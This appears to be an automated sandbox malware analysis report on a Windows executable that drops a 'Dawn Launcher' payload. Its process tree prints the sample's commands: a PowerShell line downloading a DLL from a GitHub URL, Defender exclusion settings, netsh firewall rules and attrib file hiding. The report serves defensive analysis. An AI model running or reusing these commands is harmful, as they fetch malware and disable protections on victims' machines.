Analysis
-
max time kernel
5s -
max time network
140s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
07/01/2024, 19:22
Static task
static1
Behavioral task
behavioral1
Sample
aa947ac87e8151f7a183a3ce9b0d5860.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
aa947ac87e8151f7a183a3ce9b0d5860.exe
Resource
win10v2004-20231222-en
General
-
Target
aa947ac87e8151f7a183a3ce9b0d5860.exe
-
Size
14.2MB
-
MD5
aa947ac87e8151f7a183a3ce9b0d5860
-
SHA1
02a6e9b5306695b60e58ff01ea8accc57759d6df
-
SHA256
ca1cabde17679a02f29582e8e15a59936bb6aea4c54793e1e01e1c2305c8b6a0
-
SHA512
1d77c6550e4426b9127f5887fa0b9294535bbca37e8814b2753b43b8f6e011584e3fd91917dc01b8606ea70457032f92cf6206eadef0437b9f0da50b3ddc28cd
-
SSDEEP
196608:Zu/SB9ssPSSBsElKV1bIQWfjnXVnvOlRusma7glv2Xnr6swPGOkB2bilY2nw:ug9soFplSMnF87glvQmvPlbyY
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/SInject2.dll
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral1/memory/2320-1-0x00000000010B0000-0x0000000001EE6000-memory.dmp disable_win_def behavioral1/memory/872-121-0x00000000009F0000-0x0000000001826000-memory.dmp disable_win_def -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 1720 netsh.exe 1788 netsh.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 1940 attrib.exe 2164 attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 2088 tmp1D02.tmpDawn Launcher V2.exe -
Loads dropped DLL 2 IoCs
pid Process 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 2512 Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\SysWOW64\libcrypto-1_1.dll tmp1D02.tmpDawn Launcher V2.exe File created C:\Windows\SysWOW64\libssl-1_1.dll tmp1D02.tmpDawn Launcher V2.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2088 tmp1D02.tmpDawn Launcher V2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2088 tmp1D02.tmpDawn Launcher V2.exe 2088 tmp1D02.tmpDawn Launcher V2.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2088 tmp1D02.tmpDawn Launcher V2.exe Token: SeLoadDriverPrivilege 2088 tmp1D02.tmpDawn Launcher V2.exe Token: SeRestorePrivilege 2088 tmp1D02.tmpDawn Launcher V2.exe Token: SeTakeOwnershipPrivilege 2088 tmp1D02.tmpDawn Launcher V2.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2320 wrote to memory of 2088 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 30 PID 2320 wrote to memory of 2088 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 30 PID 2320 wrote to memory of 2088 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 30 PID 2320 wrote to memory of 2088 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 30 PID 2320 wrote to memory of 1228 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 33 PID 2320 wrote to memory of 1228 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 33 PID 2320 wrote to memory of 1228 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 33 PID 2320 wrote to memory of 1228 2320 aa947ac87e8151f7a183a3ce9b0d5860.exe 33 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1940 attrib.exe 2164 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2320 -
C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe"C:\Users\Admin\AppData\Local\Temp\tmp1D02.tmpDawn Launcher V2.exe"2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"2⤵PID:1228
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Roaming\Dawn.exe2⤵PID:1604
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\aa947ac87e8151f7a183a3ce9b0d5860.exe"1⤵
- Sets file to hidden
- Views/modifies file attributes
PID:1940
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵PID:1208
-
C:\Users\Admin\AppData\Roaming\Dawn.exe"C:\Users\Admin\AppData\Roaming\Dawn.exe"2⤵PID:872
-
C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe"C:\Users\Admin\AppData\Local\Temp\tmp3717.tmpDawn Launcher V2.exe"3⤵PID:3060
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"3⤵PID:768
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:1788
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Dawn.exe" "Dawn.exe" ENABLE3⤵
- Modifies Windows Firewall
PID:1720
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "3⤵PID:2832
-
-
C:\Windows\SysWOW64\certutil.execertutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin3⤵PID:2620
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose3⤵PID:2424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,vbs,bat,hta,lnk,dll,ps1;exit3⤵PID:2476
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Roaming\Dawn.exe"1⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit1⤵PID:2660
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
388KB
MD57cb160b0abe15b3cea529ca00f880b63
SHA1c620a6386f68ff31251e1fe0f774fde80d40399f
SHA256cc594ca27a74f5c1ab71db3c980c8cb0007a23a84414f3a32ebc92ea95ec82cd
SHA5129ab45cc406634b30dfd0686bf2f6c502a1f09f85ddd31048473ce3e7ad681296ff2aad69cbb8a2e978272a5194528d8df25336c555e5e8af15b3338808b67936
-
Filesize
92KB
MD54742731bb77c1d125809906c7dafee17
SHA1c70c2452a184ee3dbaeb5f566569bc235648844d
SHA25693ee7f985541332f97d1379c180b31dc185ce283cb32e93115bb75650c33e370
SHA512414563c70b97e957cfbc76d344dd64e8a67bdadd606a59178a0b96f80778c42ffaad7e4d4e58dfefbb5982a699165a0ba4d171d006345e79937780d7b63a40b9
-
Filesize
649KB
MD5dd17771ebc61382ea1d84832cd2d886a
SHA1e2ea1805181ee8beb5d717e6679a3eada8b46d66
SHA2569c818d0262c7d1c2ec2c1271ceed8bbb6259341f3d880337afaea0dd772e322e
SHA51256089fb66283b771d2e0f7674624c418c0b7d41bf7430df8965207a2bdbffda8ee862913892f0a8da7cfa208e864f3fdc64336c46f1094fb29f1d34154df528d
-
Filesize
382KB
MD5023866645753eaaf44d90d52b1318774
SHA1494b387fbf69c9217c7a59dff4c583c58ae97087
SHA256073e485754cba379c158a1e74cb9d38980cd7aa2bf209b3b43e96b8112a67644
SHA512f0f6e62a36fe8180354af223ea7851eb2933267b0b1da8a6d84d3737156df168ffe6f0da0674f77bf68a1203375828dc0bf72ae4351ffedb3f1a0bc0b80a82be